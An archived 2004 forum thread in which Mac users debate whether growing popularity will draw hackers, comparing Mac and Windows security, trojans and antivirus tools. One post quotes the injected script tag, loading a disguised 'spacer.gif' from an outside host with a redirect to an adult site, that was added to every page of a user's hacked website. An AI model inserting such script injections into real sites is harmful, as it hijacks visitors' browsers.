PDA

View Full Version : Are Hackers Now Gunning for the Mac?


MacBytes
Oct 15, 2004, 05:26 PM
Category: Opinion/Interviews
Link: Are Hackers Now Gunning for the Mac? (http://www.macbytes.com/link.php?sid=20041015182603)
Posted on MacBytes.com (http://www.macbytes.com)

Approved by Mudbug

quagmire
Oct 15, 2004, 06:03 PM
Not at all. That means apple found many holes and fixed it before they were exploited by hackers. It doesn't mean at all hackers are gunning for the mac.

Mr. Anderson
Oct 15, 2004, 06:06 PM
But the sad reality of it is that the more popular Apple becomes, the bigger target it is.

If anyone figured out how to foobar the firm ware on an iPod it would be a very sad day....

It is a bit reassuring to get regular security updates from Apple proving that they're at least try to stay ahead of the game. :D

D

Dr. Dastardly
Oct 15, 2004, 06:29 PM
But the sad reality of it is that the more popular Apple becomes, the bigger target it is.

If anyone figured out how to foobar the firm ware on an iPod it would be a very sad day....

It is a bit reassuring to get regular security updates from Apple proving that they're at least try to stay ahead of the game. :D

D
Its kind of a catch 22 with Apple. People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!

I'll take the small market share over viruses anyday.

Analog Kid
Oct 15, 2004, 08:45 PM
What a dumb, pointless, shallow article... Anyone out there learn anything? Didn't think so...

Keynoteuser
Oct 15, 2004, 10:29 PM
OS X is not built on an OS that's full of holes going back years and years. Yes the underlying system is old, but it's not full of back doors and holes. The benefit is, even if someone makes a virus for OS X, it'll have a hard time spreading on its own, and I doubt you'll EVER see a hole in OS X large enough for someone to take over your machine without you ever doing anything but connecting to the net, which seems to be the case with Windows now. I can't imagine being an uninformed Windows users these days. They say it takes 20 min for a new Windows machine to be taken over from the time it is first connected to the net. Yikes.

Essefgy
Oct 15, 2004, 10:59 PM
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.

quagmire
Oct 15, 2004, 11:20 PM
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.

You can still have a virus in your G5 as we speak. But, it won't effect it since it is not compatible with Macs. I can have 1 billion spyware, viruses, and trojans on my pbook but, won't effect it since the stuff works on Windows only.

macnulty
Oct 15, 2004, 11:45 PM
Not much learned. If I'm not mistaken the printer/password vulnerability was found by a third party in Scandinavia or whoville and was credited, like many others, for finding it. MS anyone. Many of the vulnerabilities are not inherent in OSX because the system requires admin approval to make system changes.

yamabushi
Oct 16, 2004, 01:27 AM
So, in the worst case Mac users may have to install antivirus software in the future to actually protect their own computer rather than to just prevent the spread of viruses to other computers? Oh well.

Abstract
Oct 16, 2004, 01:58 AM
Its kind of a catch 22 with Apple. People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!

I'll take the small market share over viruses anyday.

I have never understood the desire for Apple to increase their small market share. I hope they stay small forever. Sorry, I know it's selfish, but the only benefit of Apple being bigger is Steve Jobs' paycheck, and I personally don't care about that.

paxtonandrew
Oct 16, 2004, 02:33 AM
I have never understood the desire for Apple to increase their small market share. I hope they stay small forever. Sorry, I know it's selfish, but the only benefit of Apple being bigger is Steve Jobs' paycheck, and I personally don't care about that.

Not quite true, Steve only gets paid $1, as he says, to receive health benefits, needless of the company doing good or bad, he makes all of his money through stock options, and this week, he will be laughing all the way to the bank.

Lowest Paid Chief Executive Officer
Some lucky guys get to turn their hobby into a job. Steve Jobs has always lived and breathed computers, and now they're making him very rich. OK, so he might only get a measly $1 a year, but with a luxury Gulfstream jet and 10 million lucrative share options to his name, he's unlikely to ever go begging.

Vonnie
Oct 16, 2004, 07:57 AM
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.

What was it called? Link to information?

Mr. Anderson
Oct 16, 2004, 08:24 AM
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.

And how did you know it was on there?

The one thing that might be a concern is fast user switching and not having a password on the accounts so you can just hit a button and not log in everytime. I tried that for a day and then put the passwords back on, not wanting to leave my machine open like that.

I'm sure there are plenty of people out there who don't use passwords, though.

D

Keynoteuser
Oct 16, 2004, 08:58 AM
There's only ONE trojan horse I know of, and it has to be installed manually, and it shows up in the startup items list, and can even be searched for by name, so it's not ANYTHING like the stuff on the PC that is burried deep in the registry files.

pourhadi
Oct 16, 2004, 10:26 AM
And let's not forget that a virus for UNIX may even be ineffective on the Mac - Mac viruses may even have to exploit holes in Apple's closed code, such as Aqua, and that's not going to be as easy for the hackers as exploiting a UNIX vulnerability.

eric_n_dfw
Oct 16, 2004, 10:50 AM
What they also failed to mention is the fact that the Darwin kernel is open sourced and many of the pieces that actually get the updates (OpenSSH, CUPS printing, etc) are ports from the opensource BSD community (which are often the same source code as their Linux versions). Apple and that community are mutually benefited when either one finds and fixes such exploits as the fixes are propogated to both code bases.

BSD is well known for security (especially OpenBSD) as well.

If you are a Linux or BSD user, you often see the same security updates for those distributions right before Apple's update.

space2go
Oct 16, 2004, 12:03 PM
And let's not forget that a virus for UNIX may even be ineffective on the Mac - Mac viruses may even have to exploit holes in Apple's closed code, such as Aqua, and that's not going to be as easy for the hackers as exploiting a UNIX vulnerability.

Especially as Windoze shows again and again how terribly hard it is to exploit a weakness in closed code.

Essefgy
Oct 16, 2004, 12:23 PM
What was it called? Link to information?

This is what Virex said. The files were in my Safari cache.

Found the Exploit-ByteVerify trojan !!!
Found the Exploit-ObjectData trojan !!!
Found the Exploit-MhtRedir.gen trojan !!!

As can be expected, they did not affect my Mac; but I still feel bad about passing them on.

Essefgy
Oct 16, 2004, 12:32 PM
And how did you know it was on there?

My personal website had been hacked. While during research I read somewhere how Macs are not susceptible to virus, but they can still get trojans. Feeling paranoid I did a Virex search and found it. I deleted six instances, and the website hack ceased. I guess I was hacking my own site.

Incidentally, the hack was that the following link was being added to all my pages

<script language="JavaScript” src="http://www.wizardsworldwide.com/chat/chat/localization/czech/catalog/spacer.gif?i=0c2a602a840a150cb337e2406913b775&to=http://www.f**klynx.com/lynx/Boobs/bigtits.html"></script>

P.S. Yes, I am a newbie.

wdlove
Oct 16, 2004, 02:19 PM
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.

Did you have virus software installed on you Mac? I do just for safety sake.

AmigoMac
Oct 16, 2004, 02:32 PM
Did you have virus software installed on you Mac? I do just for safety sake.

Don't you mean antivirus? ;)

Essefgy
Oct 16, 2004, 02:34 PM
I had Virex from .Mac, but I did not have the latest definitions (since corrected). I have Little Snitch running on my desktop but not on my PowerBook, so maybe my laptop was the instigator. Needless to say, I've got Little Snitch on both now. I even got Allume's Internet Cleanup for good measure.

nagromme
Oct 16, 2004, 02:35 PM
Some things are obvious:

1. Macs are more secure by design.

2. Macs are smaller targets.

BOTH those things help your data and your privacy stay secure. BOTH are good things.

But Macs already ARE a target--some high-profile targets (like the US Army web sites) use them, and crackers are tempted by the prestige of tackling a tough OS. And yet we still have no viruses.

One day we will. But we will NEVER have REMOTELY the problem of Windows. People talk as though tripling Mac market share from 5% to 15% or whatever would suddenly make Macs as vulnerable as Windows. Not so: both points above are still true.

It's nice to say "we have no viruses" while it lasts. But it's also going to be very comforting when all we can say is "we have ALMOST no viruses compared to Windows." That's still going to make me a lot happier to keep my data on a Mac.

(Re Trojan horses, a Trojan is convincing someone that one thing is another. It's one person lying to another--like an app creator saying "run my program, it does something good" when in fact it does harm, probably concealed. No OS can stop people lying to each other. All you can do is throw up a warning when installing something, but if the user trusts the source, they'll confirm the warning. No OS is secure against something the user WANTS to do, even if they are wrong to want it.)

Vonnie
Oct 16, 2004, 02:35 PM
This is what Virex said. The files were in my Safari cache.

Found the Exploit-ByteVerify trojan !!!
Found the Exploit-ObjectData trojan !!!
Found the Exploit-MhtRedir.gen trojan !!!

As can be expected, they did not affect my Mac; but I still feel bad about passing them on.

How would you be passing them on? Do you mail your Safari cache to your friends? :-)

I think Virex just scared you for no good reason (or because they want you to feel your money was well spent on virex).

You need IE for windows to be actually infected by those trojans. So your machine was never in real danger.

The safari cache files are a mix of binary data and html. To actually infect any other windows user, you would have to remove the binary data first yourself. (otherwise the windows user wouldn't be able to open it). Then you need to put the cleaned up html files on your website, mail it to your windows friends, or put them on a network share.

Vonnie
Oct 16, 2004, 02:42 PM
My personal website had been hacked. While during research I read somewhere how Macs are not susceptible to virus, but they can still get trojans. Feeling paranoid I did a Virex search and found it. I deleted six instances, and the website hack ceased. I guess I was hacking my own site.

P.S. Yes, I am a newbie.

A more likely scenario is that your network administrator found out that the server was hacked after a few days, that he found out that the hacker searched for all html-files on the server and added a trojan to them all. The network admin will just have removed the trojans, and updated the server. Probably never told his clients out of fear of losing business.

To this date, there aren't any wild trojans or viruses that target the mac. This has to do with both a good security model and quick fixes, and a fairly low installed base making it very hard to spread.

CaptainHaddock
Oct 16, 2004, 06:20 PM
People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!


I think it would be nice if Apple could get, say, a 10% market share. But even if Apple pulled even with Wintel, most of the world's clueless, hassle-tolerating computer users would be on insecure Windows boxes. Windows machines would still be the target of choice for trojans, worms, and scammers.

Look at the web server market. Apache has a 70% market share, but Microsoft's server, with 20% of the market, still gets exploited far, far more often. The company of a friend of mine, for example, had their brand new, firewalled and locked down Windows server exploited and turned into a warez box twice in their first month! Windows may be the smaller player in that market, but it's still the least secure by design, so it gets all the heat.

iMeowbot
Oct 19, 2004, 06:35 AM
Mac cracking awaits a dull and wet day (http://www.theinquirer.net/?article=19159)
"However according to people in hacking circles it is only a matter of time. One Hamburg hacker told the INQ: 'It would be nice to wipe the smug smiles off the faces of Apple people... you tell a hacker that you are invulnerable and it just makes people want to try that much harder'."

:D

billyboy
Oct 19, 2004, 07:27 AM
In view of what that hacker said I am now updating Virex before I permanently disconnect from the internet and reinstall a basic Panther only with no additional software. That'll make me feel safe!

Sadly, this is what a Windows user said to me and unlike me, he wasnt joking. He was going to buy a 2nd PC for work to be used only as an interdepartmental machine with no links to the outside world. Shame.